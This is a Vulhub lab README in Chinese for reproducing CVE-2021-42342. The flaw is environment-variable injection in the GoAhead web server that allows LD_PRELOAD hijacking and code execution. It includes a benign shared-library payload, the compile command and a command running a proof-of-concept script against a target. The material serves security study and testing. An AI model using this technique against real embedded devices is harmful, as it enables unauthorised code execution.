Files
vulhub/goahead/CVE-2021-42342/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
first commit
2025-09-06 16:08:15 +08:00

54 lines
1.9 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# GoAhead Server 环境变量注入导致远程代码执行漏洞CVE-2021-42342
GoAhead是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行的Web Server多用于嵌入式系统、智能设备。其支持运行ASP、Javascript和标准的CGI程序。
这个漏洞是[CVE-2017-17562](https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562)漏洞补丁的绕过攻击者可以利用该补丁没有考虑到的multipart表单控制目标服务器的环境变量进而劫持`LD_PRELOAD`来执行任意代码。
参考链接:
- https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562
- https://ahmed-belkahla.me/post/2-methods-rce-0-day-in-goahead-webserver-pbctf-2021/
- https://mp.weixin.qq.com/s/AS9DHeHtgqrgjTb2gzLJZg
## 漏洞环境
执行如下命令启动GoAhead 5.1.4
```
docker compose up -d
```
启动完成后,访问`http://your-ip:8080/`即可看到欢迎页面。访问`http://your-ip:8080/cgi-bin/index`即可查看到Hello页面即为CGI执行的结果。
## 漏洞复现
我们首先需要编译一个动态链接库而且需要和目标架构相同。所以在实战中如果对方是一个智能设备你可能需要交叉编译。因为Vulhub运行在`Linux x86_64`的机器中所以我们直接用Linux PC编译即可。动态链接库源码
```C
#include <unistd.h>
static void before_main(void) __attribute__((constructor));
static void before_main(void)
{
write(1, "Hello: World\r\n\r\n", 16);
write(1, "Hacked\n", 7);
}
```
这样,`before_main`函数将在程序执行前被调用。编译以上代码:
```
gcc -s -shared -fPIC ./payload.c -o payload.so
```
然后,我们使用[这个脚本](poc.py)来发送恶意数据包,复现漏洞:
```
python poc.py http://target-ip:8080/cgi-bin/index /path/to/payload.so
```
可见,我们在动态链接库中编写的劫持代码已经被成功执行:
![](1.png)